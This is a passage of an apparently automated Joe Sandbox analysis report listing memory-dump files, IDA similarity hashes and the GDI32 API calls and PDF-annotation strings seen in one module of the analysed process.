                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C01B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C025000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0A6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C126000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C13C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C155000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C17A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C18F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1BF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1C3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1CB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1949014806.000000006C1CF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1949068075.000000006C1D3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1949104916.000000006C1DB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1949135568.000000006C1DF000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_6bd90000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1954432d402aa53da50adf09b9499b3b86813e0521b5a5d6a3a8ca0ede292353
                                                                                                        • Instruction ID: e176cbac52f80ef38ac02974bdd7cbcc17d276c73f275b6d67e908a8ed442326
                                                                                                        • Opcode Fuzzy Hash: 1954432d402aa53da50adf09b9499b3b86813e0521b5a5d6a3a8ca0ede292353
                                                                                                        • Instruction Fuzzy Hash: 62812971B007198FDB60EF74C480A6AB7B1FF89314F204769DA15AB341EB34E952CBA1
                                                                                                        APIs
                                                                                                        • SetStretchBltMode.GDI32(00000000,00000004), ref: 6BE4FC9B
                                                                                                        • GetObjectType.GDI32(?), ref: 6BE4FCA4
                                                                                                        • CreateBitmap.GDI32 ref: 6BE4FCD3
                                                                                                        • SelectObject.GDI32(?,00000000), ref: 6BE4FCDD
                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 6BE4FCFD
                                                                                                        • SelectObject.GDI32(?,00000000), ref: 6BE4FD21
                                                                                                        • DeleteObject.GDI32(00000000), ref: 6BE4FD28
                                                                                                        • GetDeviceCaps.GDI32(?,0000000C), ref: 6BE4FD3B
                                                                                                        • GetDeviceCaps.GDI32(?,00000008), ref: 6BE4FD45
                                                                                                        • GetDeviceCaps.GDI32(?,0000000A), ref: 6BE4FD4F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.1939458887.000000006BE46000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD90000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.1939426958.000000006BD90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BD91000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BD9A000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BED4000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BF03000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BF07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BF16000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006BFFA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C01B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C025000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0A6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C126000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C13C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C155000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C17A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C18F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1BF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1C3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1CB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1949014806.000000006C1CF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1949068075.000000006C1D3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1949104916.000000006C1DB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1949135568.000000006C1DF000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_6bd90000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Object$CapsDevice$Select$BitmapCreateDeleteModeStretchType
                                                                                                        • String ID:
                                                                                                        • API String ID: 3133578033-0
                                                                                                        • Opcode ID: 824d1f7ea7e33bd30fc717f7b1acced9e8f78fdd1f61e62a263af8154b59dbb6
                                                                                                        • Instruction ID: fe887ecd87f489cc207d9cca60f3d9ad6035b125a2efbccc14fa31da29fd090a
                                                                                                        • Opcode Fuzzy Hash: 824d1f7ea7e33bd30fc717f7b1acced9e8f78fdd1f61e62a263af8154b59dbb6
                                                                                                        • Instruction Fuzzy Hash: 44316B71A007449FDB249F38C845A6BBFF4FF45700F008A2DE99AC6651EB74EA54DBA0
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.1939458887.000000006BE46000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD90000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.1939426958.000000006BD90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BD91000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BD9A000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BED4000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BF03000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BF07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BF16000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006BFFA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C01B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C025000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0A6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C126000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C13C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C155000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C17A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C18F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1BF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1C3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1CB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1949014806.000000006C1CF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1949068075.000000006C1D3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1949104916.000000006C1DB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1949135568.000000006C1DF000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_6bd90000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: #214
                                                                                                        • String ID: Link$Rect$Subtype
                                                                                                        • API String ID: 1405426997-3862875103
                                                                                                        • Opcode ID: d55766aee5798e940f679ff7ced7ee195779afa34f13f8b69fe979dbba3b619a
                                                                                                        • Instruction ID: 5afb19373da9e1a710fbab0c7471db681875072dce3b627a5600193b6fa22d89
                                                                                                        • Opcode Fuzzy Hash: d55766aee5798e940f679ff7ced7ee195779afa34f13f8b69fe979dbba3b619a
                                                                                                        • Instruction Fuzzy Hash: E65196317002198FDF24EF68C891AAE7BF5FF5A718B1000A9D916AB341DB35ED15CBA1
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.1939458887.000000006BE46000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD90000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.1939426958.000000006BD90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BD91000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BD9A000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BED4000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BF03000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BF07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BF16000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006BFFA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C01B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C025000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0A6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C126000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C13C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C155000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C17A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C18F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1BF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1C3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1CB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1949014806.000000006C1CF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1949068075.000000006C1D3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1949104916.000000006C1DB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1949135568.000000006C1DF000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_6bd90000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Highlight$Subtype
                                                                                                        • API String ID: 0-3181136990
                                                                                                        • Opcode ID: c73402f8960a731783f644039d7c4b1dc7e69f1a3dcc0063a1f2a17617df4d07
                                                                                                        • Instruction ID: 5378266eb2f5622721ea01c157c03b131457b52f4ffe96687bb3d024caf2abe1
                                                                                                        • Opcode Fuzzy Hash: c73402f8960a731783f644039d7c4b1dc7e69f1a3dcc0063a1f2a17617df4d07
                                                                                                        • Instruction Fuzzy Hash: 43213772F4010D4BEF088E74C841A7B7769EF88658F110A29D9299F750FB35F91287D0